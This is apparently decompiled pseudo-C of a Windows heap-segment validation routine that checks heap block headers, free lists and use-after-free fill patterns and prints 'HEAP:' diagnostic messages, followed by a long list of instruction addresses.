						if( *((intOrPtr*)(_t344 + 0x30)) == _t194) {
							L107:
							return 1;
						}
						_t196 =  *[fs:0x30];
						__eflags =  *(_t196 + 0xc);
						if( *(_t196 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t344 + 0x30)));
						_push(_t344);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E1D7CB910();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t403);
					_push( *((intOrPtr*)(_t344 + 0x2c)));
					_push(_t344);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t402;
					if( *(_t401 + 0x4c) != 0) {
						 *_t402 =  *_t402 ^  *(_t401 + 0x50);
						_t411 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
						if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
							_push(_t345);
							E1D88D646(_t344, _t401, _t402, _t401, _t402, _t411);
						}
					}
					if(_v8 != ( *(_t402 + 4) ^  *(_t401 + 0x54))) {
						_t215 =  *[fs:0x30];
						__eflags =  *(_t215 + 0xc);
						if( *(_t215 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t352 =  *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff;
						__eflags = _t352;
						_push(_t352);
						E1D7CB910("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t402);
						L117:
						__eflags =  *(_t401 + 0x4c);
						if( *(_t401 + 0x4c) != 0) {
							 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
							 *_t402 =  *_t402 ^  *(_t401 + 0x50);
							__eflags =  *_t402;
						}
						goto L119;
					}
					_t230 =  *_t402 & 0x0000ffff;
					_t384 =  *(_t402 + 2);
					_t354 = _t230;
					_v8 = _t354;
					_v20 = _t354;
					_v28 = _t230 << 3;
					if((_t384 & 0x00000001) == 0) {
						__eflags =  *(_t401 + 0x40) & 0x00000040;
						_t356 = (_t354 & 0xffffff00 | ( *(_t401 + 0x40) & 0x00000040) != 0x00000000) & _t384 >> 0x00000002;
						__eflags = _t356 & 0x00000001;
						if((_t356 & 0x00000001) == 0) {
							L66:
							_t357 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t357 =  *_t357 + ( *_t402 & 0x0000ffff);
							__eflags =  *_t357;
							L67:
							_t236 =  *(_t402 + 6);
							if(_t236 == 0) {
								_t345 = _t401;
							} else {
								_t345 = (_t402 & 0xffff0000) - ((_t236 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t345 != _t344) {
								_t237 =  *[fs:0x30];
								__eflags =  *(_t237 + 0xc);
								if( *(_t237 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t402 + 6) & 0x000000ff);
								_push(_t402);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t402 + 7)) != 3) {
									__eflags =  *(_t401 + 0x4c);
									if( *(_t401 + 0x4c) != 0) {
										 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										__eflags =  *_t402;
									}
									_t402 = _t402 + _v28;
									__eflags = _t402;
									goto L86;
								}
								_t250 =  *(_t402 + 0x1c);
								if(_t250 == 0) {
									_t251 =  *_t402 & 0x0000ffff;
									__eflags = _t402 + _t251 * 8 -  *((intOrPtr*)(_t344 + 0x28));
									if(_t402 + _t251 * 8 ==  *((intOrPtr*)(_t344 + 0x28))) {
										__eflags =  *(_t401 + 0x4c);
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											__eflags =  *_t402;
										}
										goto L107;
									}
									_t257 =  *[fs:0x30];
									__eflags =  *(_t257 + 0xc);
									if( *(_t257 + 0xc) == 0) {
										_push("HEAP: ");
										E1D7CB910();
									} else {
										E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t344 + 0x28)));
									_push(_t402);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E1D7CB910();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t250 >> 0xc);
								if( *(_t401 + 0x4c) != 0) {
									 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
									 *_t402 =  *_t402 ^  *(_t401 + 0x50);
								}
								_t402 = _t402 + 0x20 +  *(_t402 + 0x1c);
								if(_t402 ==  *((intOrPtr*)(_t344 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t401 + 0x4c) != 0) {
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										_t429 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
										if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
											_push(_t345);
											_t345 = _t401;
											E1D88D646(_t344, _t345, _t402, _t401, _t402, _t429);
										}
									}
									if( *(_t401 + 0x54) !=  *(_t402 + 4)) {
										_t267 =  *[fs:0x30];
										__eflags =  *(_t267 + 0xc);
										if( *(_t267 + 0xc) == 0) {
											_push("HEAP: ");
											E1D7CB910();
										} else {
											E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff);
										_push(_t402);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t291 = _v28 + 0xfffffff0;
						_v24 = _t291;
						__eflags = _t384 & 0x00000002;
						if((_t384 & 0x00000002) != 0) {
							__eflags = _t291 - 4;
							if(_t291 > 4) {
								_t291 = _t291 - 4;
								__eflags = _t291;
								_v24 = _t291;
							}
						}
						__eflags = _t384 & 0x00000008;
						if((_t384 & 0x00000008) == 0) {
							_t105 = _t402 + 0x10; // -8
							_t293 = E1D8280A0(_t105, _t291, 0xfeeefeee);
							_v20 = _t293;
							__eflags = _t293 - _v24;
							if(_t293 != _v24) {
								_t294 =  *[fs:0x30];
								__eflags =  *(_t294 + 0xc);
								if( *(_t294 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _v20 + 8 + _t402;
								__eflags = _t298;
								_push(_t298);
								_push(_t402);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t372 =  *((intOrPtr*)(_t402 + 8));
							_t387 =  *((intOrPtr*)(_t402 + 0xc));
							_v24 = _t372;
							_v28 = _t387;
							_t304 =  *((intOrPtr*)(_t372 + 4));
							__eflags =  *_t387 - _t304;
							if( *_t387 != _t304) {
								L64:
								_push(0);
								_push( *_t387);
								_push(_t304);
								_t104 = _t402 + 8; // -16
								_t345 = 0xd;
								E1D895FED(_t345, _t401);
								goto L86;
							}
							_t59 = _t402 + 8; // -16
							__eflags =  *_t387 - _t59;
							_t374 = _v24;
							if( *_t387 != _t59) {
								goto L64;
							}
							 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) - _v20;
							_t389 =  *(_t401 + 0xb4);
							__eflags = _t389;
							if(_t389 == 0) {
								L35:
								_t308 = _v28;
								 *_t308 = _t374;
								 *(_t374 + 4) = _t308;
								__eflags =  *(_t402 + 2) & 0x00000008;
								if(( *(_t402 + 2) & 0x00000008) == 0) {
									L39:
									_t375 =  *_t402 & 0x0000ffff;
									_t309 = _t401 + 0xc0;
									_v28 =  *_t402 & 0x0000ffff;
									 *(_t402 + 2) = 0;
									 *((char*)(_t402 + 7)) = 0;
									__eflags =  *(_t401 + 0xb4);
									if( *(_t401 + 0xb4) == 0) {
										_t345 =  *_t309;
									} else {
										_t345 = E1D7D1C0E(_t401, _t375);
										_t309 = _t401 + 0xc0;
									}
									__eflags = _t309 - _t345;
									if(_t309 == _t345) {
										L51:
										_t310 =  *((intOrPtr*)(_t345 + 4));
										__eflags =  *_t310 - _t345;
										if( *_t310 != _t345) {
											_push(0);
											_push( *_t310);
											__eflags = 0;
											_push(0);
											_push(_t345);
											_t345 = 0xd;
											E1D895FED(_t345, 0);
										} else {
											_t90 = _t402 + 8; // -16
											_t393 = _t90;
											 *_t393 = _t345;
											 *((intOrPtr*)(_t393 + 4)) = _t310;
											 *_t310 = _t393;
											 *((intOrPtr*)(_t345 + 4)) = _t393;
										}
										 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) + ( *_t402 & 0x0000ffff);
										_t392 =  *(_t401 + 0xb4);
										__eflags = _t392;
										if(_t392 == 0) {
											L61:
											__eflags =  *(_t401 + 0x4c);
											if(__eflags != 0) {
												 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
												 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											}
											goto L86;
										} else {
											_t376 =  *_t402 & 0x0000ffff;
											while(1) {
												__eflags = _t376 -  *((intOrPtr*)(_t392 + 4));
												if(_t376 <  *((intOrPtr*)(_t392 + 4))) {
													break;
												}
												_t317 =  *_t392;
												__eflags = _t317;
												if(_t317 == 0) {
													_t319 =  *((intOrPtr*)(_t392 + 4)) - 1;
													L60:
													_t97 = _t402 + 8; // -16
													_t345 = _t401;
													E1D7D1B5D(_t345, _t392, 1, _t97, _t319, _t376);
													goto L61;
												}
												_t392 = _t317;
											}
											_t319 = _t376;
											goto L60;
										}
									} else {
										_t394 =  *(_t401 + 0x4c);
										while(1) {
											__eflags = _t394;
											if(_t394 == 0) {
												_t322 =  *(_t345 - 8) & 0x0000ffff;
											} else {
												_t325 =  *(_t345 - 8);
												_t394 =  *(_t401 + 0x4c);
												__eflags = _t394 & _t325;
												if((_t394 & _t325) != 0) {
													_t325 = _t325 ^  *(_t401 + 0x50);
													__eflags = _t325;
												}
												_t322 = _t325 & 0x0000ffff;
											}
											__eflags = _v28 - (_t322 & 0x0000ffff);
											if(_v28 <= (_t322 & 0x0000ffff)) {
												goto L51;
											}
											_t345 =  *_t345;
											__eflags = _t401 + 0xc0 - _t345;
											if(_t401 + 0xc0 != _t345) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t327 = E1D7CF5C7(_t401, _t402);
								__eflags = _t327;
								if(_t327 != 0) {
									goto L39;
								}
								_t345 = _t401;
								E1D7CF113(_t345, _t402,  *_t402 & 0x0000ffff, 1);
								goto L86;
							}
							_t379 =  *_t402 & 0x0000ffff;
							while(1) {
								__eflags = _t379 -  *((intOrPtr*)(_t389 + 4));
								if(_t379 <  *((intOrPtr*)(_t389 + 4))) {
									break;
								}
								_t330 =  *_t389;
								__eflags = _t330;
								if(_t330 == 0) {
									_t332 =  *((intOrPtr*)(_t389 + 4)) - 1;
									L34:
									_t66 = _t402 + 8; // -16
									E1D7E036A(_t401, _t389, 1, _t66, _t332, _t379);
									_t374 = _v24;
									goto L35;
								}
								_t389 = _t330;
							}
							_t332 = _t379;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t402 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E1D87D62C(_t401, _t402) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t384 & 0x00000002) == 0) {
							_t336 =  *(_t402 + 3) & 0x000000ff;
						} else {
							_t338 = E1D803AE9(_t402);
							_t354 = _v20;
							_t336 =  *(_t338 + 2) & 0x0000ffff;
						}
						_t416 = _t336;
						if(_t416 == 0) {
							goto L18;
						}
						if(_t416 >= 0) {
							__eflags = _t336 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t336 -  *((intOrPtr*)(_t401 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t399 = _a20;
							_t337 = _t336 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t399 + _t337 * 4)) =  *((intOrPtr*)(_t399 + _t337 * 4)) + _t354;
							goto L18;
						}
						_t337 = _t336 & 0x00007fff;
						if(_t337 >= 0x81) {
							goto L18;
						}
						_t399 = _a24;
						goto L17;
					}
					L86:
				} while (_t402 <  *((intOrPtr*)(_t344 + 0x28)));
				_t194 = _v12;
				goto L88;
			}






























































                                                                                                                                                                                          0x1d880e6d
                                                                                                                                                                                          0x1d880e75
                                                                                                                                                                                          0x1d880e79
                                                                                                                                                                                          0x1d880e7b
                                                                                                                                                                                          0x1d880e7f
                                                                                                                                                                                          0x1d880e81
                                                                                                                                                                                          0x1d880e86
                                                                                                                                                                                          0x1d880e88
                                                                                                                                                                                          0x1d880e8d
                                                                                                                                                                                          0x1d881221
                                                                                                                                                                                          0x1d881221
                                                                                                                                                                                          0x1d881227
                                                                                                                                                                                          0x1d881434
                                                                                                                                                                                          0x1d881437
                                                                                                                                                                                          0x1d881357
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881357
                                                                                                                                                                                          0x1d88143d
                                                                                                                                                                                          0x1d881443
                                                                                                                                                                                          0x1d881447
                                                                                                                                                                                          0x1d881466
                                                                                                                                                                                          0x1d88146b
                                                                                                                                                                                          0x1d881449
                                                                                                                                                                                          0x1d88145e
                                                                                                                                                                                          0x1d881463
                                                                                                                                                                                          0x1d881471
                                                                                                                                                                                          0x1d881474
                                                                                                                                                                                          0x1d881477
                                                                                                                                                                                          0x1d881478
                                                                                                                                                                                          0x1d88142a
                                                                                                                                                                                          0x1d88142a
                                                                                                                                                                                          0x1d88140e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88140e
                                                                                                                                                                                          0x1d881237
                                                                                                                                                                                          0x1d881415
                                                                                                                                                                                          0x1d88141a
                                                                                                                                                                                          0x1d88123d
                                                                                                                                                                                          0x1d881252
                                                                                                                                                                                          0x1d881257
                                                                                                                                                                                          0x1d881420
                                                                                                                                                                                          0x1d881421
                                                                                                                                                                                          0x1d881424
                                                                                                                                                                                          0x1d881425
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880e93
                                                                                                                                                                                          0x1d880e93
                                                                                                                                                                                          0x1d880e9a
                                                                                                                                                                                          0x1d880e9c
                                                                                                                                                                                          0x1d880ea1
                                                                                                                                                                                          0x1d880eab
                                                                                                                                                                                          0x1d880eae
                                                                                                                                                                                          0x1d880eb0
                                                                                                                                                                                          0x1d880eb5
                                                                                                                                                                                          0x1d880eb5
                                                                                                                                                                                          0x1d880eae
                                                                                                                                                                                          0x1d880ec6
                                                                                                                                                                                          0x1d8813a4
                                                                                                                                                                                          0x1d8813aa
                                                                                                                                                                                          0x1d8813ae
                                                                                                                                                                                          0x1d8813cd
                                                                                                                                                                                          0x1d8813d2
                                                                                                                                                                                          0x1d8813b0
                                                                                                                                                                                          0x1d8813c5
                                                                                                                                                                                          0x1d8813ca
                                                                                                                                                                                          0x1d8813e2
                                                                                                                                                                                          0x1d8813e7
                                                                                                                                                                                          0x1d8813e7
                                                                                                                                                                                          0x1d8813e9
                                                                                                                                                                                          0x1d8813f0
                                                                                                                                                                                          0x1d8813f8
                                                                                                                                                                                          0x1d8813f8
                                                                                                                                                                                          0x1d8813fc
                                                                                                                                                                                          0x1d881406
                                                                                                                                                                                          0x1d88140c
                                                                                                                                                                                          0x1d88140c
                                                                                                                                                                                          0x1d88140c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8813fc
                                                                                                                                                                                          0x1d880ecc
                                                                                                                                                                                          0x1d880ecf
                                                                                                                                                                                          0x1d880ed2
                                                                                                                                                                                          0x1d880ed7
                                                                                                                                                                                          0x1d880eda
                                                                                                                                                                                          0x1d880edd
                                                                                                                                                                                          0x1d880ee3
                                                                                                                                                                                          0x1d880f58
                                                                                                                                                                                          0x1d880f64
                                                                                                                                                                                          0x1d880f66
                                                                                                                                                                                          0x1d880f69
                                                                                                                                                                                          0x1d881139
                                                                                                                                                                                          0x1d88113c
                                                                                                                                                                                          0x1d88113f
                                                                                                                                                                                          0x1d881144
                                                                                                                                                                                          0x1d881144
                                                                                                                                                                                          0x1d881146
                                                                                                                                                                                          0x1d881146
                                                                                                                                                                                          0x1d88114b
                                                                                                                                                                                          0x1d881165
                                                                                                                                                                                          0x1d88114d
                                                                                                                                                                                          0x1d88115d
                                                                                                                                                                                          0x1d88115d
                                                                                                                                                                                          0x1d881169
                                                                                                                                                                                          0x1d881360
                                                                                                                                                                                          0x1d881366
                                                                                                                                                                                          0x1d88136a
                                                                                                                                                                                          0x1d881389
                                                                                                                                                                                          0x1d88138e
                                                                                                                                                                                          0x1d88136c
                                                                                                                                                                                          0x1d881381
                                                                                                                                                                                          0x1d881386
                                                                                                                                                                                          0x1d881398
                                                                                                                                                                                          0x1d881399
                                                                                                                                                                                          0x1d88139a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88116f
                                                                                                                                                                                          0x1d881173
                                                                                                                                                                                          0x1d8811fc
                                                                                                                                                                                          0x1d881200
                                                                                                                                                                                          0x1d88120a
                                                                                                                                                                                          0x1d881210
                                                                                                                                                                                          0x1d881210
                                                                                                                                                                                          0x1d881210
                                                                                                                                                                                          0x1d881212
                                                                                                                                                                                          0x1d881212
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881212
                                                                                                                                                                                          0x1d881179
                                                                                                                                                                                          0x1d88117e
                                                                                                                                                                                          0x1d8812f4
                                                                                                                                                                                          0x1d8812fa
                                                                                                                                                                                          0x1d8812fd
                                                                                                                                                                                          0x1d881341
                                                                                                                                                                                          0x1d881345
                                                                                                                                                                                          0x1d88134f
                                                                                                                                                                                          0x1d881355
                                                                                                                                                                                          0x1d881355
                                                                                                                                                                                          0x1d881355
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881345
                                                                                                                                                                                          0x1d8812ff
                                                                                                                                                                                          0x1d881305
                                                                                                                                                                                          0x1d881309
                                                                                                                                                                                          0x1d881328
                                                                                                                                                                                          0x1d88132d
                                                                                                                                                                                          0x1d88130b
                                                                                                                                                                                          0x1d881320
                                                                                                                                                                                          0x1d881325
                                                                                                                                                                                          0x1d881333
                                                                                                                                                                                          0x1d881336
                                                                                                                                                                                          0x1d881337
                                                                                                                                                                                          0x1d8812a0
                                                                                                                                                                                          0x1d8812a0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8812a5
                                                                                                                                                                                          0x1d881184
                                                                                                                                                                                          0x1d88118a
                                                                                                                                                                                          0x1d881191
                                                                                                                                                                                          0x1d88119b
                                                                                                                                                                                          0x1d8811a1
                                                                                                                                                                                          0x1d8811a1
                                                                                                                                                                                          0x1d8811a9
                                                                                                                                                                                          0x1d8811ae
                                                                                                                                                                                          0x1d8811f6
                                                                                                                                                                                          0x1d8811f6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8811b0
                                                                                                                                                                                          0x1d8811b4
                                                                                                                                                                                          0x1d8811b9
                                                                                                                                                                                          0x1d8811c3
                                                                                                                                                                                          0x1d8811c6
                                                                                                                                                                                          0x1d8811c8
                                                                                                                                                                                          0x1d8811cb
                                                                                                                                                                                          0x1d8811cd
                                                                                                                                                                                          0x1d8811cd
                                                                                                                                                                                          0x1d8811c6
                                                                                                                                                                                          0x1d8811da
                                                                                                                                                                                          0x1d8812ad
                                                                                                                                                                                          0x1d8812b3
                                                                                                                                                                                          0x1d8812b7
                                                                                                                                                                                          0x1d8812d6
                                                                                                                                                                                          0x1d8812db
                                                                                                                                                                                          0x1d8812b9
                                                                                                                                                                                          0x1d8812ce
                                                                                                                                                                                          0x1d8812d3
                                                                                                                                                                                          0x1d8812eb
                                                                                                                                                                                          0x1d8812ec
                                                                                                                                                                                          0x1d8812ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8811e0
                                                                                                                                                                                          0x1d8811e4
                                                                                                                                                                                          0x1d8811ee
                                                                                                                                                                                          0x1d8811f4
                                                                                                                                                                                          0x1d8811f4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8811e4
                                                                                                                                                                                          0x1d8811da
                                                                                                                                                                                          0x1d8811ae
                                                                                                                                                                                          0x1d881169
                                                                                                                                                                                          0x1d880f72
                                                                                                                                                                                          0x1d880f75
                                                                                                                                                                                          0x1d880f78
                                                                                                                                                                                          0x1d880f7b
                                                                                                                                                                                          0x1d880f7d
                                                                                                                                                                                          0x1d880f80
                                                                                                                                                                                          0x1d880f82
                                                                                                                                                                                          0x1d880f82
                                                                                                                                                                                          0x1d880f85
                                                                                                                                                                                          0x1d880f85
                                                                                                                                                                                          0x1d880f80
                                                                                                                                                                                          0x1d880f88
                                                                                                                                                                                          0x1d880f8b
                                                                                                                                                                                          0x1d881124
                                                                                                                                                                                          0x1d881128
                                                                                                                                                                                          0x1d88112d
                                                                                                                                                                                          0x1d881130
                                                                                                                                                                                          0x1d881133
                                                                                                                                                                                          0x1d88125d
                                                                                                                                                                                          0x1d881263
                                                                                                                                                                                          0x1d881267
                                                                                                                                                                                          0x1d881286
                                                                                                                                                                                          0x1d88128b
                                                                                                                                                                                          0x1d881269
                                                                                                                                                                                          0x1d88127e
                                                                                                                                                                                          0x1d881283
                                                                                                                                                                                          0x1d881297
                                                                                                                                                                                          0x1d881297
                                                                                                                                                                                          0x1d881299
                                                                                                                                                                                          0x1d88129a
                                                                                                                                                                                          0x1d88129b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88129b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f91
                                                                                                                                                                                          0x1d880f91
                                                                                                                                                                                          0x1d880f94
                                                                                                                                                                                          0x1d880f97
                                                                                                                                                                                          0x1d880f9a
                                                                                                                                                                                          0x1d880f9d
                                                                                                                                                                                          0x1d880fa0
                                                                                                                                                                                          0x1d880fa2
                                                                                                                                                                                          0x1d881106
                                                                                                                                                                                          0x1d881106
                                                                                                                                                                                          0x1d881108
                                                                                                                                                                                          0x1d88110c
                                                                                                                                                                                          0x1d88110d
                                                                                                                                                                                          0x1d881113
                                                                                                                                                                                          0x1d881114
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881114
                                                                                                                                                                                          0x1d880fa8
                                                                                                                                                                                          0x1d880fab
                                                                                                                                                                                          0x1d880fad
                                                                                                                                                                                          0x1d880fb0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880fb9
                                                                                                                                                                                          0x1d880fbc
                                                                                                                                                                                          0x1d880fc2
                                                                                                                                                                                          0x1d880fc4
                                                                                                                                                                                          0x1d880fec
                                                                                                                                                                                          0x1d880fec
                                                                                                                                                                                          0x1d880fef
                                                                                                                                                                                          0x1d880ff1
                                                                                                                                                                                          0x1d880ff4
                                                                                                                                                                                          0x1d880ff8
                                                                                                                                                                                          0x1d881021
                                                                                                                                                                                          0x1d881021
                                                                                                                                                                                          0x1d881024
                                                                                                                                                                                          0x1d88102c
                                                                                                                                                                                          0x1d88102f
                                                                                                                                                                                          0x1d881032
                                                                                                                                                                                          0x1d881035
                                                                                                                                                                                          0x1d88103b
                                                                                                                                                                                          0x1d881050
                                                                                                                                                                                          0x1d88103d
                                                                                                                                                                                          0x1d881046
                                                                                                                                                                                          0x1d881048
                                                                                                                                                                                          0x1d881048
                                                                                                                                                                                          0x1d881052
                                                                                                                                                                                          0x1d881054
                                                                                                                                                                                          0x1d881087
                                                                                                                                                                                          0x1d881087
                                                                                                                                                                                          0x1d88108a
                                                                                                                                                                                          0x1d88108c
                                                                                                                                                                                          0x1d88109d
                                                                                                                                                                                          0x1d88109f
                                                                                                                                                                                          0x1d8810a1
                                                                                                                                                                                          0x1d8810a3
                                                                                                                                                                                          0x1d8810a5
                                                                                                                                                                                          0x1d8810a8
                                                                                                                                                                                          0x1d8810a9
                                                                                                                                                                                          0x1d88108e
                                                                                                                                                                                          0x1d88108e
                                                                                                                                                                                          0x1d88108e
                                                                                                                                                                                          0x1d881091
                                                                                                                                                                                          0x1d881093
                                                                                                                                                                                          0x1d881096
                                                                                                                                                                                          0x1d881098
                                                                                                                                                                                          0x1d881098
                                                                                                                                                                                          0x1d8810b1
                                                                                                                                                                                          0x1d8810b4
                                                                                                                                                                                          0x1d8810ba
                                                                                                                                                                                          0x1d8810bc
                                                                                                                                                                                          0x1d8810e1
                                                                                                                                                                                          0x1d8810e1
                                                                                                                                                                                          0x1d8810e5
                                                                                                                                                                                          0x1d8810f3
                                                                                                                                                                                          0x1d8810f9
                                                                                                                                                                                          0x1d8810f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8810be
                                                                                                                                                                                          0x1d8810be
                                                                                                                                                                                          0x1d8810cb
                                                                                                                                                                                          0x1d8810cb
                                                                                                                                                                                          0x1d8810ce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8810c3
                                                                                                                                                                                          0x1d8810c5
                                                                                                                                                                                          0x1d8810c7
                                                                                                                                                                                          0x1d881103
                                                                                                                                                                                          0x1d8810d2
                                                                                                                                                                                          0x1d8810d4
                                                                                                                                                                                          0x1d8810d7
                                                                                                                                                                                          0x1d8810dc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8810dc
                                                                                                                                                                                          0x1d8810c9
                                                                                                                                                                                          0x1d8810c9
                                                                                                                                                                                          0x1d8810d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8810d0
                                                                                                                                                                                          0x1d881056
                                                                                                                                                                                          0x1d881056
                                                                                                                                                                                          0x1d881059
                                                                                                                                                                                          0x1d881059
                                                                                                                                                                                          0x1d88105b
                                                                                                                                                                                          0x1d88106f
                                                                                                                                                                                          0x1d88105d
                                                                                                                                                                                          0x1d88105d
                                                                                                                                                                                          0x1d881060
                                                                                                                                                                                          0x1d881063
                                                                                                                                                                                          0x1d881065
                                                                                                                                                                                          0x1d881067
                                                                                                                                                                                          0x1d881067
                                                                                                                                                                                          0x1d881067
                                                                                                                                                                                          0x1d88106a
                                                                                                                                                                                          0x1d88106a
                                                                                                                                                                                          0x1d881076
                                                                                                                                                                                          0x1d881079
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88107b
                                                                                                                                                                                          0x1d881083
                                                                                                                                                                                          0x1d881085
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881085
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881059
                                                                                                                                                                                          0x1d881054
                                                                                                                                                                                          0x1d880ffe
                                                                                                                                                                                          0x1d881003
                                                                                                                                                                                          0x1d881005
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88100f
                                                                                                                                                                                          0x1d881011
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d881011
                                                                                                                                                                                          0x1d880fc6
                                                                                                                                                                                          0x1d880fd3
                                                                                                                                                                                          0x1d880fd3
                                                                                                                                                                                          0x1d880fd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880fcb
                                                                                                                                                                                          0x1d880fcd
                                                                                                                                                                                          0x1d880fcf
                                                                                                                                                                                          0x1d88101e
                                                                                                                                                                                          0x1d880fda
                                                                                                                                                                                          0x1d880fdc
                                                                                                                                                                                          0x1d880fe4
                                                                                                                                                                                          0x1d880fe9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880fe9
                                                                                                                                                                                          0x1d880fd1
                                                                                                                                                                                          0x1d880fd1
                                                                                                                                                                                          0x1d880fd8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880fd8
                                                                                                                                                                                          0x1d880f8b
                                                                                                                                                                                          0x1d880ee9
                                                                                                                                                                                          0x1d880f38
                                                                                                                                                                                          0x1d880f3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
